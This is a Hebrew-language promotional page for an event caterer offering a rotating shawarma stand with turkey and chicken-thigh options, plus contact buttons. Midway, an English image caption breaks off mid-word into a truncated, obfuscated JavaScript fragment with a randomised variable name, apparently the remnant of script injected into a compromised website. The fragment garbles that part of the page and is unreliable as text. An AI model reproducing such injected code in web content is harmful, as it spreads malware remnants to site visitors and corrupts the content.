להפקת אירוע מושלם: 054-2044257

 

דוכן שווארמה

 

רוצים להדהים את האורחים עם דוכן שווארמה אורגינל? אנו מציעים לכם דוכן שווארמה מקורי לחלוטין, המסתובב מול עיני האורחים ומפיץ ריחות לכל עבר. קשה לעמוד בפני המראה, הריח והטעם של דוכן השווארמה שלנו והניסיון מלמד כי משתרך לפניו תור ארוך, בכל אירוע.

20180322_144536 (1) (1)

• שווארמה הודו – לאנשים שמחפשים בשר רזה ורוצים ליהנות משווארמה אך לשמור על הבריאות ועל אחוזי שומן נמוכים. עם תיבול נכון ובישול מקצועי, שווארמה הודו היא מעדן טעים ומוצלח.

20180322_144515

• שווארמה פרגיות – הפרגית הופכת את דוכן השווארמה לדוכן איכותי במיוחד, תודות לבשר הפרגית הרך והטעים. שיטת הבישול המסתובבת צולה את הבשר הטעים מכל צדדיו ומתקבלת מנה מעולה ומוצלחת.

Shawarma meat being cut before making a s$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==

עמדת שווארמה 

רוצים להדהים את האורחים עם דוכן שווארמה אורגינל? אנו מציעים לכם עמדה עם גלגל שווארמה מקורי לחלוטין, המסתובב מול עיני האורחים ומפיץ ריחות לכל עבר. קשה לעמוד בפני המראה, הריח והטעם של דוכן השווארמה שלנו והניסיון מלמד כי משתרך לפניו תור ארוך, בכל אירוע.

שווארמה טעימה לאירועים

אנו ממליצים לכם להזמין אצלנו ב- sweet&fun דוכן שווארמה לכל אירוע, החל מאירועי בר מצווה עם בני נוער מורעבים, וכלה באירוח לעובדים שבו אתם רוצים להפתיע עם כיבוד טעים ומושקע.

 

 

להצעת מחיר

Call Now Buttonהתקשר כעת
גלילה לראש העמוד
דילוג לתוכן